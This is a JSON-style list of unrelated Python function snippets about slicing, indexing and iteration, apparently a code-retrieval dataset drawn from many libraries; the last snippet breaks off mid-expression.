[ "def slice(iterable, *args):\n return iter(it.islice(iterable, *args))", "def __getitem__(self, arg):\n if isinstance(arg, slice):\n # get value from slice\n start, stop, step = arg.start, arg.stop, arg.step\n # sanitize step\n if step is None:\n step = 1\n if step < 1:\n raise ValueError(\"step must be positive\")\n # make sure the stream is in the right place to start\n if start is None:\n start = 0\n if start < self.current:\n self.rewind(start)\n if start > self.current:\n self.skip_forward(start - self.current)\n\n # sanity check\n if stop is not None and stop < start:\n raise ValueError(\"start must be less than stop\")\n # special case, we can't just return self, because __iter__ rewinds\n if step == 1 and stop is None:\n # keep going until exhausted\n return (self.next() for _ in itertools.repeat(True))\n\n return self._step_gen(step, stop)\n\n elif isinstance(arg, int):\n self.rewind(arg)\n return self.next()\n else:\n raise ValueError(\"Invalid arguement, use either a `slice` or \" +\n \"or an `int`. not {t}\".format(t=str(type(arg))))", "def from_sequence(self, seq):\n return Iter(self._from_sequence(seq))", "def __getitem__(self, i):\n self._load(False)\n\n if type(i) == slice:\n # Normalize the slice a bit such that it doesn't\n # have any negative or None values\n start, stop, step = i.start, i.stop, i.step\n if start is None:\n start = 0\n elif start < 0:\n start += self.count\n if stop is None:\n stop = self.count\n elif stop < 0:\n stop += self.count\n if not step:\n step = 1\n\n # If we're iterating backwards, start at the end\n if step < 0:\n key = self.head - self.count + stop - 1\n else:\n key = self.head - self.count + start\n\n return self._iter(key, stop - start, step)\n else:\n if i < 0:\n i += self.count\n return self.db[(self.head - self.count + i) % self.size]", "def __getslice__(self, start, stop):\n return self.__getitem__(slice(start, stop, None))", "def frombuffer(self, slice_data):\n return NotImplemented", "def SliceView(sequence, start=None, stop=None, step=1):\n start, stop, step = slice(start, stop, step).indices(len(sequence))\n for i in range(start, stop, step):\n yield sequence[i]", "def __iter__(self):\n\n starts = range(0, self.data.shape[self.axis], self.chunksize)\n\n for t in zip_longest(starts, starts[1:], fillvalue=None):\n yield self.data[self._slice(*t)]", "def __getitem__(self, ndx):\n if type(ndx) is slice:\n return list(islice(self._all(), ndx.start, ndx.stop, ndx.step or 1))\n else:\n return islice(self._all(), ndx, ndx+1).next()", "def _slice(self, start, stop, step=None):\n\n slices = [slice(None)] * self.data.ndim\n slices[self.axis] = slice(start, stop, step)\n return tuple(slices)", "def slice(self, begin, end):\n sliced = self._collection.slice(begin, end)\n return self.set_collection(sliced)", "def _conv_slice_to_list(slice_obj, start_def=0, stop_def=100, step_def=1):\n if slice_obj.start is None:\n start = start_def\n else:\n start = slice_obj.start\n if slice_obj.stop is None:\n stop = stop_def\n else:\n stop = slice_obj.stop\n if slice_obj.step is None:\n step = step_def\n else:\n step = slice_obj.step\n return list(range(start, stop, step))", "def create_slice(*, stop : Optional[int] = None, start : Optional[int] = None, step : Optional[int] = None) -> slice:\n return slice(start, stop, step)", "def normalize_slice(s):\n start, stop, step = s.start, s.stop, s.step\n if start is None:\n start = 0\n if step is None:\n step = 1\n if start < 0 or step < 0 or stop is not None and stop < 0:\n raise NotImplementedError()\n return slice(start, stop, step)", "def _make_dataset_iterator(self, dataset):\n # Note that split_batch_by argument is not passed because it is always 1 in\n # this strategy, and adding it adds unnecessary overhead to the dataset.\n return input_lib_v1.DatasetIterator(dataset, self._input_workers,\n self._container_strategy())", "def from_iterable(self, iterable):\n raise NotImplementedError()", "def test_getslice1(self):\n class C(list):\n def __getitem__(self, index):\n return (index.start, index.stop)\n\n a = C()\n self.assertEqual(a[32:197], (32,197))", "def __getitem__(self, item):\n if isinstance(item, slice):\n start = item.start or 0\n stop = item.stop if item.stop is not None else len(self.data)\n stop = min(stop, len(self.data))\n if stop - start == 0:\n return type(self)(xnd.xnd([], type=self.data.type))\n\n elif isinstance(item, Iterable):\n if not is_array_like(item):\n item = np.array(item)\n if is_integer_dtype(item):\n return self.take(item)\n elif is_bool_dtype(item):\n indices = np.array(item)\n indices = np.argwhere(indices).flatten()\n return self.take(indices)\n else:\n raise IndexError(\n \"Only integers, slices and integer or boolean \\\n arrays are valid indices.\"\n )\n\n elif is_integer(item):\n if item < 0:\n item += len(self)\n if item >= len(self):\n return None\n else:\n\n return self.data[item]\n\n value = self.data[item]\n return type(self)(value)", "def __setslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint2___setslice__(self, *args)", "def slicer(seq, start=None, stop=None, step=None):\n return seq[start:stop:step]", "def make_data_iterator(input):\n assert isinstance(input, DataLoader)\n data_iterator = iter(input)\n return data_iterator", "def fromiter(iterable, dtype, count=-1):\n\n return call_origin(numpy.fromiter, iterable, dtype, count)", "def _get_slice(segments, shape):\n\n if not (1 <= len(shape) <= 2):\n raise ValueError('Cannot segment array of shape: %s' % str(shape))\n else:\n size = shape[0]\n slice_length = np.ceil(float(size) / segments)\n start_idx = 0\n end_idx = slice_length\n while start_idx < size:\n if len(shape) == 1:\n yield slice(start_idx, end_idx)\n else:\n yield (slice(start_idx, end_idx), slice(None))\n start_idx = end_idx\n end_idx = min(start_idx + slice_length, size)", "def __getslice__(self, i, j):\n return self.__getitem__(slice(i,j))", "def __getslice__(self, i, j):\n return self.__getitem__(slice(i, j))", "def __iter__(self):\n pass\n\n # TODO: range, based on iterator", "def __getitem__(self, t: Union[slice, Sequence[int], Sequence[bool]]\n ) -> \"ImageSequence\":\n t = self._resolve_index(t)\n if isinstance(t, np.ndarray):\n ret = copy.copy(self)\n ret._indices = t\n ret._is_slice = True\n ret._len = len(t)\n return ret\n # Assume t is a number\n return self._get_single_frame(int(t))", "def __getitem__(self, idx):\n if not isinstance(idx, slice):\n return self._fetch()[idx]\n return self._fetch()[idx.start:idx.stop]", "def __getitem__(self, item: slice | tuple):\n if isinstance(item, slice):\n start, stop = item.start, item.stop\n if start is None:\n start = 0\n if stop is None:\n stop = maxsize\n if start > stop:\n raise IndexError(\"make sure start <= stop\")\n return self.query(Orthotope([Interval(start, stop)]))\n elif isinstance(item, tuple):\n pass\n else:\n raise TypeError(f\"unrecognized index {item}\")", "def process_slice(slc, shape, n):\n if not isinstance(slc, tuple):\n slc = (slc,)\n slc = list(slc)\n ndim = len(shape) - n\n assert ndim >= 0\n shape_idx = 0\n for slice_idx, s in enumerate(slc):\n if s == nax:\n continue\n if shape[shape_idx] == 1:\n if type(s) == int:\n slc[slice_idx] = 0\n else:\n slc[slice_idx] = slice(None)\n shape_idx += 1\n if shape_idx != ndim:\n raise IndexError('Must have %d terms in the slice object' % ndim)\n return extend_slice(tuple(slc), n)", "def slice_(self, start, stop):\n \n sl = UnorderedList()\n \n current = self.head\n \n for i in range(min(stop, self.length())):\n if i >= start:\n sl.append(current.get_data())\n current = current.get_next()\n \n return sl", "def __getitem__(self, idx):\n # if key is slice, return a new HSP instance\n if isinstance(idx, slice):\n obj = self.__class__(self._items[idx])\n self._transfer_attrs(obj)\n return obj\n return self._items[idx]", "def from_slicer(cls, *args, **kwargs):\n slicer_instance = cls.__new__(cls)\n cls._init_slicer(slicer_instance, *args, **kwargs)\n return slicer_instance", "def slice(self, start=None, end=None, inplace=False):\n if inplace:\n self.data = self.data[start:end]\n else:\n cpy = self.copy()\n\n cpy.data = cpy.data[start:end]\n\n return cpy\n return", "def __iter__(self):\n try:\n self._load(False)\n except KeyError:\n return iter([])\n\n return self._iter(self.head - self.count, self.count)", "def _create_slice(cls, onnx_node, inputs, opset_version):\n # we move several inputs to singa's attribuates\n # and mark them so we don't use them when we run this operator\n starts = tensor.to_numpy(inputs.pop(1)).astype(np.int32).tolist()\n ends = tensor.to_numpy(inputs.pop(1)).astype(np.int32).tolist()\n # sometime onnx may ignore these two inputs, axes and step\n if len(inputs) >= 2 and onnx_node.inputs[3] != '':\n axes = tensor.to_numpy(inputs.pop(1)).astype(np.int32).tolist()\n else:\n axes = None\n steps = tensor.to_numpy(inputs.pop(1)).astype(\n np.int32).tolist() if len(inputs) >= 2 else None\n onnx_node.consumed_inputs.extend(onnx_node.inputs[1:])\n _, forward = cls._common_onnx_node_to_singa_op(onnx_node, inputs,\n opset_version)\n return _, forward(starts, ends, axes, steps)", "def __getitem__(self, idx):\n assert isinstance(\n idx, (int, slice)), \"Index Could be an integer or a slice\"\n\n if isinstance(idx, int) and idx < 0:\n for cur_index in range(-idx):\n obj, pos = self.__get_json_from_end()\n if -cur_index - 1 == idx:\n return json.loads(obj, encoding=\"utf-8\")\n raise IndexError\n\n if isinstance(idx, slice):\n to_extract = (elm for elm in gen_increasing_slice(idx))\n else:\n to_extract = [idx]\n\n results = []\n\n for target_idx in to_extract:\n self.__descriptor.seek(0, 0)\n cur_idx = 0\n\n checkpoint = self.__get_checkpoint(target_idx)\n if checkpoint != False:\n self.__descriptor.seek(checkpoint[1])\n cur_idx = checkpoint[0]\n self.__last_index = checkpoint[0]\n self.__last_index_pos = checkpoint[1]\n\n if self.__last_index > cur_idx and target_idx > self.__last_index:\n self.__descriptor.seek(self.__last_index_pos)\n cur_idx = self.__last_index\n\n for obj, start in iter(lambda: self.__get_json(), (None, -1)):\n last_obj = obj\n self.__last_index_pos = start\n self.__last_index = cur_idx\n\n if cur_idx == target_idx:\n results.append(json.loads(last_obj, encoding=\"utf-8\"))\n break\n\n cur_idx += 1\n\n if isinstance(idx, slice):\n if idx.start is not None and idx.stop is not None and idx.start > idx.stop:\n return list(reversed(results))\n return results\n else:\n return results.pop(0)", "def __getitem__(self, n):\n s = self._clone()\n\n if isinstance(n, slice):\n # If negative slicing, abort.\n if n.start and n.start < 0 or n.stop and n.stop < 0:\n raise #XXX\n # Elasticsearch won't get all results so we default to size: 10 if\n # stop not given.\n s._extra['from'] = n.start or 0\n s._extra['size'] = n.stop - (n.start or 0) if n.stop else 10\n return s\n else: # This is an index lookup, equivalent to slicing by [n:n+1].\n # If negative index, abort.\n if n < 0:\n raise #XXX\n s._extra['from'] = n\n s._extra['size'] = 1\n return s", "def to_slice(self):\n return np.index_exp[self.start[2]:self.end[2], #\n self.start[1]:self.end[1], #\n self.start[0]:self.end[0]]", "def _slice(self, dict_data, partition):\n dict_data_iter = iter(dict_data)\n for _ in range(0, len(dict_data), partition):\n yield {k: dict_data[k] for k in islice(dict_data_iter, partition)}", "def _get_slice(series, start, length):\n return [ int(s) for s in series[start:start+length] ]", "def __iter__(self):\n # type: () -> Iterator[Any]\n return iter(self[index] for index in range(len(self)))", "def __iter__(self):\n # deterministically shuffle based on epoch\n if self.shuffle:\n g = torch.Generator()\n g.manual_seed(self.epoch)\n indices = torch.randperm(len(self.dataset), generator=g).tolist()\n else:\n indices = torch.arange(len(self.dataset)).tolist()\n\n # add extra samples to make it evenly divisible\n indices += indices[:(self.total_size - len(indices))]\n if not len(indices) == self.total_size:\n raise ValueError('the length of the indices should be equal to total_size')\n\n # subsample\n indices = indices[self.rank:self.total_size:self.num_replicas]\n if not len(indices) == self.num_samples:\n raise ValueError(\"the length of the indices should be equal to num_samples in subsample\")\n\n return iter(indices)", "def _read_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def _read_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def __setslice__(self, *args):\n return _itkSurfaceSpatialObjectPointPython.vectoritkSurfaceSpatialObjectPoint2___setslice__(self, *args)", "def __iter__(self) -> Iterator:\n if self.ndim > 1:\n for i in range(len(self)):\n yield self[i]\n else:\n # convert in chunks of 10k for efficiency\n data = self.asi8\n length = len(self)\n chunksize = 10000\n chunks = (length // chunksize) + 1\n\n for i in range(chunks):\n start_i = i * chunksize\n end_i = min((i + 1) * chunksize, length)\n converted = ints_to_pydatetime(\n data[start_i:end_i],\n tz=self.tz,\n box=\"timestamp\",\n reso=self._creso,\n )\n yield from converted", "def __setslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint3___setslice__(self, *args)", "def __iter__(self):\n return iter(range(1, self.size() + 1))", "def _init_sorted_slice(self, *args, **kwargs): # real signature unknown\n pass", "def byte_slices(self) -> Iterator[slice]:\n for byte_index in islice(self.byte_offsets, 0, self.max_bytes, 8):\n yield slice(byte_index, byte_index + 8)", "def slice(self) -> Tuple[slice, ...]:\n\n total_slice = tuple(slice(None) for _ in self.collection_shape)\n for obj in self.objects.flat:\n for i, current_slice in enumerate(obj.slices):\n if total_slice[i].start is None:\n total_slice = total_slice[:i] + (current_slice,) + total_slice[i + 1:]\n else:\n if current_slice.start < total_slice[i].start:\n total_slice = total_slice[:i] + (\n slice(current_slice.start, total_slice[i].stop, total_slice[i].step),) + total_slice[i + 1:]\n if current_slice.stop > total_slice[i].stop:\n total_slice = total_slice[:i] + (\n slice(total_slice[i].start, current_slice.stop, total_slice[i].step),) + total_slice[i + 1:]\n return total_slice", "def __iter__(self) -> Union[Iterator[int], Iterator[Tuple[int, Any]]]:\n self.size = self._data._dataset_size\n if (not self._data._fully_cached or\n self._data._should_call_prefetch_source):\n self._data._start_iteration()\n # First epoch of lazy loading, calling prefetch, and returning\n # indices and examples.\n iterator = self._iterator_unknown_size()\n else:\n # Non-lazy loading, or when dataset has been fully iterated.\n assert self.size is not None\n iterator = self._iterator_given_size(self.size)\n\n if self._data._should_call_prefetch_processed:\n # Processing routine is performed in main process. Yield\n # processed examples instead.\n map_fn = lambda idx: (idx, self._data._processed_cache[idx])\n elif self._data._should_yield_raw_example:\n # Return indices and examples for any epoch in this case.\n map_fn = lambda idx: (idx, self._data._source[idx])\n else:\n map_fn = None # type: ignore\n if map_fn is not None:\n return map(map_fn, iterator)\n\n return iterator", "def slice(\n start: Optional[int] = None, stop: Optional[int] = None, step: int = 1\n) -> Callable[[AsyncObservable[_TSource]], AsyncObservable[_TSource]]:\n\n def _slice(source: AsyncObservable[_TSource]) -> AsyncObservable[_TSource]:\n nonlocal start\n\n if start is not None:\n if start < 0:\n source = pipe(source, take_last(abs(start)))\n else:\n source = pipe(source, skip(start))\n\n if stop is not None:\n if stop > 0:\n start = start or 0\n source = pipe(source, take(stop - start))\n else:\n source = pipe(source, skip_last(abs(stop)))\n\n if step is not None:\n if step > 1:\n mapper: Callable[[Any, int], bool] = lambda _, i: i % step == 0\n xs = pipe(source, filteri(mapper))\n source = xs\n elif step < 0:\n # Reversing streams is not supported\n raise TypeError(\"Negative step not supported.\")\n\n return source\n\n return _slice", "def subseq(self, start_offset=0, end_offset=None):\n def subseq_iter(start_offset, end_offset):\n for point in self._elements:\n #Skip until start\n if point[offset_attr] < start_offset:\n continue\n\n #Yield points start_offset <= point < end_offset\n if end_offset is None or point[offset_attr] < end_offset:\n yield point\n else:\n raise StopIteration\n return _OSeq(subseq_iter(start_offset, end_offset))", "def __setslice__(self, i, j, sequence):\n self.__field.validate(sequence)\n list.__setslice__(self, i, j, sequence)", "def _handle_result_by_idx_slice(self, idx_slice):\n opts = dict(self.options)\n skip = opts.pop('skip', 0)\n limit = opts.pop('limit', None)\n py_to_couch_validate('skip', skip)\n py_to_couch_validate('limit', limit)\n start = idx_slice.start\n stop = idx_slice.stop\n data = None\n # start and stop cannot be None and both must be greater than 0\n if all(i is not None and i >= 0 for i in [start, stop]) and start < stop:\n if limit is not None:\n if start >= limit:\n # Result is out of range\n return dict()\n if stop > limit:\n # Ensure that slice does not extend past original limit\n return self._ref(skip=skip+start, limit=limit-start, **opts)\n data = self._ref(skip=skip+start, limit=stop-start, **opts)\n elif start is not None and stop is None and start >= 0:\n if limit is not None:\n if start >= limit:\n # Result is out of range\n return dict()\n # Ensure that slice does not extend past original limit\n data = self._ref(skip=skip+start, limit=limit-start, **opts)\n else:\n data = self._ref(skip=skip+start, **opts)\n elif start is None and stop is not None and stop >= 0:\n if limit is not None and stop > limit:\n # Ensure that slice does not extend past original limit\n data = self._ref(skip=skip, limit=limit, **opts)\n else:\n data = self._ref(skip=skip, limit=stop, **opts)\n return data", "def test_slice(self):\n user_a = self.Person.objects.create(name=\"User A\", age=20)\n user_b = self.Person.objects.create(name=\"User B\", age=30)\n user_c = self.Person.objects.create(name=\"User C\", age=40)\n\n # Test slice limit\n people = list(self.Person.objects[:2])\n assert len(people) == 2\n assert people[0] == user_a\n assert people[1] == user_b\n\n # Test slice skip\n people = list(self.Person.objects[1:])\n assert len(people) == 2\n assert people[0] == user_b\n assert people[1] == user_c\n\n # Test slice limit and skip\n people = list(self.Person.objects[1:2])\n assert len(people) == 1\n assert people[0] == user_b\n\n # Test slice limit and skip on an existing queryset\n people = self.Person.objects\n assert len(people) == 3\n people2 = people[1:2]\n assert len(people2) == 1\n assert people2[0] == user_b\n\n # Test slice limit and skip cursor reset\n qs = self.Person.objects[1:2]\n # fetch then delete the cursor\n qs._cursor\n qs._cursor_obj = None\n people = list(qs)\n assert len(people) == 1\n assert people[0].name == \"User B\"\n\n # Test empty slice\n people = list(self.Person.objects[1:1])\n assert len(people) == 0\n\n # Test slice out of range\n people = list(self.Person.objects[80000:80001])\n assert len(people) == 0\n\n # Test larger slice __repr__\n self.Person.objects.delete()\n for i in range(55):\n self.Person(name=\"A%s\" % i, age=i).save()\n\n assert self.Person.objects.count() == 55\n assert \"Person object\" == \"%s\" % self.Person.objects[0]\n assert (\n \"[<Person: Person object>, <Person: Person object>]\"\n == \"%s\" % self.Person.objects[1:3]\n )\n assert (\n \"[<Person: Person object>, <Person: Person object>]\"\n == \"%s\" % self.Person.objects[51:53]\n )", "def __get_slice(islice, isize):\n if islice[0] is None:\n if islice[1] is None:\n return slice(isize)\n else:\n return slice(islice[1])\n else:\n if islice[1] is None:\n return slice(islice[0], isize)\n else:\n return slice(islice[0], islice[1])", "def _slice_index(self, slicer):\n start = self.index_location(slicer.start) if slicer.start is not None else 0\n end = self.index_location(slicer.stop) if slicer.stop is not None else self.size\n return list(range(start, end))", "def __getslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint2___getslice__(self, *args)", "def get_slice(self, limit, offset):\r\n if limit == 0:\r\n return self.objects[offset:]\r\n\r\n return self.objects[offset:offset + limit]", "def _getitem_slice(self: MultiIndex, slobj: slice) -> MultiIndex:\n sortorder = None\n if slobj.step is None or slobj.step > 0:\n sortorder = self.sortorder\n\n new_codes = [level_codes[slobj] for level_codes in self.codes]\n\n return type(self)(\n levels=self.levels,\n codes=new_codes,\n names=self._names,\n sortorder=sortorder,\n verify_integrity=False,\n )", "def getSlice(properties=None, **kw):", "def relay_array_getitem(c, a, start, stop, strides):\n assert start.is_constant(tuple)\n assert stop.is_constant(tuple)\n assert strides.is_constant(tuple)\n return relay.op.transform.strided_slice(c.ref(a), start.value, stop.value,\n strides.value)", "def __getitem__(self, item):\n # type (Any) -> Any\n # Workaround for Arrow bug that segfaults on empty slice.\n # This is fixed in Arrow master, will be released in 0.10\n if isinstance(item, slice):\n start = item.start or 0\n stop = item.stop if item.stop is not None else len(self.data)\n stop = min(stop, len(self.data))\n step = item.step if item.step is not None else 1\n # Arrow can't handle slices with steps other than 1\n # https://issues.apache.org/jira/browse/ARROW-2714\n if step != 1:\n arr = np.asarray(self)[item]\n # ARROW-2806: Inconsistent handling of np.nan requires adding a mask\n if pa.types.is_integer(self.dtype.arrow_dtype) or pa.types.is_floating(\n self.dtype.arrow_dtype\n ):\n mask = pd.isna(arr)\n else:\n mask = None\n return type(self)(pa.array(arr, type=self.dtype.arrow_dtype, mask=mask))\n if stop - start == 0:\n return type(self)(pa.array([], type=self.data.type))\n elif isinstance(item, Iterable):\n if not is_array_like(item):\n item = np.array(item)\n if is_integer_dtype(item):\n return self.take(item)\n elif is_bool_dtype(item):\n indices = np.array(item)\n indices = np.argwhere(indices).flatten()\n return self.take(indices)\n else:\n raise IndexError(\n \"Only integers, slices and integer or boolean arrays are valid indices.\"\n )\n elif is_integer(item):\n if item < 0:\n item += len(self)\n if item >= len(self):\n return None\n value = self.data[item]\n if isinstance(value, pa.ChunkedArray):\n return type(self)(value)\n else:\n return value.as_py()", "def __iter__(self):\r\n if self._shuffle:\r\n perm = torch.randperm(self._subset_size)\r\n return iter(self._subset[perm].tolist())\r\n return iter(self._subset)", "def __getitem__(self, i: Union[int, slice]) -> Union[Any, LinkedList]:\n\n if isinstance(i, int):\n\n if i < 0:\n i = self._length + i\n\n curr = self._first\n curr_index = 0\n\n while curr is not None and curr_index != i:\n curr = curr.next\n curr_index += 1\n\n if curr is None:\n raise IndexError\n else:\n return curr.item\n else:\n start = i.start\n stop = i.stop\n\n if start is None:\n start = 0\n if stop is None:\n stop = self._length\n\n if not (0 <= start <= stop <= len(self)):\n raise IndexError\n else:\n new_linked_list = LinkedList([])\n index = 0\n\n for item in self:\n if start <= index < stop:\n new_linked_list.append(item)\n elif index > stop:\n break\n index += 1\n\n return new_linked_list", "def copy(self) -> \"Iter\":\n self._iterator, other = itertools.tee(self._iterator, 2)\n return Iter(other, self._size_hint)", "def __init__(self, iterator):\n self._iter = iterator", "def __init__(self, data, chunksize, axis, **kwargs):\n \n super().__init__(data, chunksize, axis, **kwargs)\n\n # Pop the start and stop from kwargs\n a = self.kwargs.pop('start', 0)\n b = self.kwargs.pop('stop', self.data.shape[axis])\n self.start, self.stop, _ = slice(a, b).indices(data.shape[axis])\n \n # close for serialization\n self.data.close()", "def cqt_slices(record, t_len, shuffle=True, auto_restart=True,\n add_noise=True, random_seed=None,\n slice_logger=None):\n def cqt_slicer(cqt, idx, counter, t_len):\n obs = utils.slice_ndarray(cqt, idx[counter], length=t_len, axis=1)\n return obs[np.newaxis, ...]\n\n for cqt_slice in base_slicer(\n record, t_len, cqt_slicer,\n shuffle=shuffle, auto_restart=auto_restart,\n add_noise=add_noise, random_seed=random_seed,\n npz_data_key='cqt',\n slice_logger=slice_logger):\n yield cqt_slice", "def __init__(self, iterator):\n super().__init__(iterator,\n join=lambda x: x, empty=lambda x: [],\n init=lambda content, index: content)", "def chunkerator(obj: Iterable, stepsize: int = 10) -> Iterator:\n\n if obj:\n chunk, obj = obj[0:stepsize], obj[stepsize:]\n\n try:\n yield chunk\n yield from chunkerator(obj, stepsize=stepsize)\n except (RuntimeError, StopIteration, UnboundLocalError):\n pass", "def convert_slice(slice_, min=None, max=None):\n step = slice_.step\n if slice_.step is None:\n step = 1\n\n sign = -1 if slice_.start > slice_.stop else 1\n start = slice_.start\n step = sign*abs(step)\n stop = slice_.stop + sign\n\n # Limit to min/max\n minf = __builtins__['min']\n maxf = __builtins__['max']\n\n if sign == 1:\n if min is not None:\n start = maxf(min, start)\n if max is not None:\n stop = minf(max + step, stop)\n else:\n if min is not None:\n stop = maxf(min + step, stop)\n if max is not None:\n start = minf(max, start)\n\n return slice(start, stop, step)", "def test_oldclass_and_direct(self):\n class OldStyle:\n def __getitem__(self, index):\n return index\n\n class OldStyleWithLen:\n def __getitem__(self, index):\n return index\n def __len__(self):\n return 10\n\n class NewStyle(object):\n def __getitem__(self, index):\n return index\n\n class OldStyleWithLenAndGetSlice:\n def __getitem__(self, index):\n return index\n def __len__(self):\n return 10\n def __getslice__(self, start, stop):\n return start, stop\n\n # slice object should pass through unmodified if constructed explicitly.\n self.assertEqual(NewStyle()[slice(None, -1, None)], slice(None, -1, None))\n self.assertEqual(OldStyleWithLen()[slice(None, -1, None)], slice(None, -1, None))\n self.assertEqual(OldStyle()[slice(None, -1, None)], slice(None, -1, None))\n self.assertEqual(OldStyleWithLenAndGetSlice()[slice(None, -1, None)], slice(None, -1, None))\n\n # using the slice syntax\n self.assertEqual(NewStyle()[:-1], slice(None, -1, None))\n self.assertEqual(OldStyleWithLen()[:-1], slice(None, -1, None))\n self.assertEqual(OldStyleWithLenAndGetSlice()[:-1], slice(None, -1))\n self.assertEqual(OldStyle()[:-1:1], slice(None, -1, 1))\n self.assertEqual(OldStyle()[:-1], slice(-1))\n self.assertEqual(OldStyle()[-1:], slice(-1, None))\n self.assertEqual(OldStyle()[:-1:None], slice(None, -1, None))\n self.assertEqual(OldStyle()[-1::None], slice(-1, None, None))\n self.assertEqual(OldStyle()[:-1:], slice(None, -1, None))\n self.assertEqual(OldStyle()[-1::], slice(-1, None, None))", "def __getitem__(self, idx):\n if not isinstance(idx, (slice, numbers.Integral)):\n raise ValueError('Index indices must be integers')\n if isinstance(idx, slice):\n if idx.step not in (None, 1):\n raise IndexError('Index does not support variable stepping')\n s, e = None, None\n if idx.start is not None:\n s = idx.start\n if s < 0:\n s += len(self)\n s = self.lookup(s)\n if idx.stop is not None:\n e = idx.stop\n if e >= len(self):\n e = None\n else:\n e = self.lookup(e)\n idx = slice(s, e)\n else:\n idx = self.lookup(idx)\n return self.src[idx]", "def __getitem__(self, k):\n if not isinstance(k, (slice,) + six.integer_types):\n raise TypeError\n assert ((not isinstance(k, slice) and (k >= 0))\n or (isinstance(k, slice) and (k.start is None or k.start >= 0)\n and (k.stop is None or k.stop >= 0))), \\\n \"Negative indexing is not supported.\"\n\n if self._result_cache is not None:\n return self._result_cache[k]\n\n if isinstance(k, slice):\n if k.start is not None:\n self.start = int(k.start)\n else:\n self.start = 0\n if k.stop is not None:\n self.size = int(k.stop) - self.start\n else:\n self.size = self.default_size\n self._fetch_all()\n return self._result_cache\n\n self.start = k\n self.size = 1\n self._fetch_all()\n return self._result_cache[0]", "def convert_slice(g, op, block):\n\n data = g.get_node(op.input(\"Input\")[0])\n dims = len(infer_shape(data))\n\n axes = op.attr(\"axes\")\n indices = _expr.const(axes, dtype=\"int64\")\n\n decrease_axis = op.attr(\"decrease_axis\")\n if isinstance(decrease_axis, int):\n decrease_axis = [decrease_axis]\n\n if op.input(\"StartsTensor\"):\n starts = g.get_node(op.input(\"StartsTensor\")[0])\n starts, infered = try_infer_value(starts, g.get_params())\n if infered:\n starts = starts.tolist()\n elif op.input(\"StartsTensorList\"):\n starts = []\n for start_index in op.input(\"StartsTensorList\"):\n start_index = g.get_node(start_index).astype(\"int64\")\n starts.append(start_index)\n starts = _op.concatenate(starts, axis=0)\n starts, infered = try_infer_value(starts, g.get_params())\n if infered:\n starts = starts.tolist()\n else:\n starts = op.attr(\"starts\")\n\n if len(axes) < dims:\n if isinstance(starts, _expr.Expr):\n starts = _op.scatter_elements(\n _op.const([0] * dims, dtype=infer_type(starts).checked_type.dtype),\n indices,\n starts,\n axis=0,\n )\n else:\n base = [0] * dims\n for i, axis in enumerate(axes):\n base[axis] = starts[i]\n starts = base\n\n if op.input(\"EndsTensor\"):\n ends = g.get_node(op.input(\"EndsTensor\")[0])\n ends, infered = try_infer_value(ends, g.get_params())\n if infered:\n ends = ends.tolist()\n elif op.input(\"EndsTensorList\"):\n ends = []\n for end_index in op.input(\"EndsTensorList\"):\n end_index = g.get_node(end_index).astype(\"int64\")\n ends.append(end_index)\n ends = _op.concatenate(ends, axis=0)\n ends, infered = try_infer_value(ends, g.get_params())\n if infered:\n ends = ends.tolist()\n else:\n ends = op.attr(\"ends\")\n\n if len(axes) < dims:\n if isinstance(ends, _expr.Expr):\n ends = _op.scatter_elements(\n _expr.const(\n np.array([np.iinfo(np.int32).max] * dims),\n dtype=infer_type(ends).checked_type.dtype,\n ),\n indices,\n ends,\n axis=0,\n )\n else:\n base = [np.iinfo(np.int32).max] * dims\n for i, axis in enumerate(axes):\n base[axis] = ends[i]\n ends = base\n\n strides = None\n if \"StridesTensor\" in op.input_names and op.input(\"StridesTensor\"):\n strides = g.get_node(op.input(\"StridesTensor\")[0])\n strides, infered = try_infer_value(strides, g.get_params())\n if infered:\n strides = strides.tolist()\n elif \"StridesTensorList\" in op.input_names and op.input(\"StridesTensorList\"):\n strides = []\n for strides_index in op.input(\"StridesTensorList\"):\n strides_index = g.get_node(strides_index).astype(\"int64\")\n strides.append(strides_index)\n strides = _op.concatenate(strides, axis=0)\n strides, infered = try_infer_value(strides, g.get_params())\n if infered:\n strides = strides.tolist()\n elif op.has_attr(\"strides\"):\n strides = op.attr(\"strides\")\n\n if len(axes) < dims:\n if isinstance(strides, _expr.Expr):\n strides = _op.scatter_elements(\n _expr.const(np.array([1] * dims), dtype=infer_type(strides).checked_type.dtype),\n indices,\n strides,\n axis=0,\n )\n elif strides:\n base = [1] * dims\n for i, axis in enumerate(axes):\n base[axis] = strides[i]\n strides = base\n if not strides:\n strides = _op.const([1] * dims, dtype=\"int64\")\n\n out = _op.strided_slice(data, begin=starts, end=ends, strides=strides)\n out_shape = infer_shape(out)\n if decrease_axis and len(out_shape) > 1:\n out = _op.squeeze(out, axis=decrease_axis)\n g.add_node(op.output(\"Out\")[0], out)", "def minibatch_slices_iterator(length: int,\n batch_size: int,\n skip_incomplete: bool = False\n ) -> Generator[slice, None, None]:\n start = 0\n stop1 = (length // batch_size) * batch_size\n while start < stop1:\n yield slice(start, start + batch_size, 1)\n start += batch_size\n if not skip_incomplete and start < length:\n yield slice(start, length, 1)", "def __init__(self, iterator):\n self.iterator = []\n while iterator.hasNext():\n self.iterator.append(iterator.next())", "def connection_from_list_slice(list_slice, args=None, connection_type=None,\n edge_type=None, pageinfo_type=None,\n slice_start=0, list_length=0, list_slice_length=None):\n connection_type = connection_type or Connection\n edge_type = edge_type or Edge\n pageinfo_type = pageinfo_type or PageInfo\n\n args = args or {}\n\n before = args.get('before')\n after = args.get('after')\n first = args.get('first')\n last = args.get('last')\n if list_slice_length is None:\n list_slice_length = len(list_slice)\n slice_end = slice_start + list_slice_length\n before_offset = get_offset_with_default(before, list_length)\n after_offset = get_offset_with_default(after, -1)\n\n start_offset = max(\n slice_start - 1,\n after_offset,\n -1\n ) + 1\n end_offset = min(\n slice_end,\n before_offset,\n list_length\n )\n if isinstance(first, int):\n end_offset = min(\n end_offset,\n start_offset + first\n )\n if isinstance(last, int):\n start_offset = max(\n start_offset,\n end_offset - last\n )\n\n # If supplied slice is too large, trim it down before mapping over it.\n _slice = list_slice[\n max(start_offset - slice_start, 0):\n list_slice_length - (slice_end - end_offset)\n ]\n edges = [\n edge_type(\n node=node,\n cursor=offset_to_cursor(start_offset + i)\n )\n for i, node in 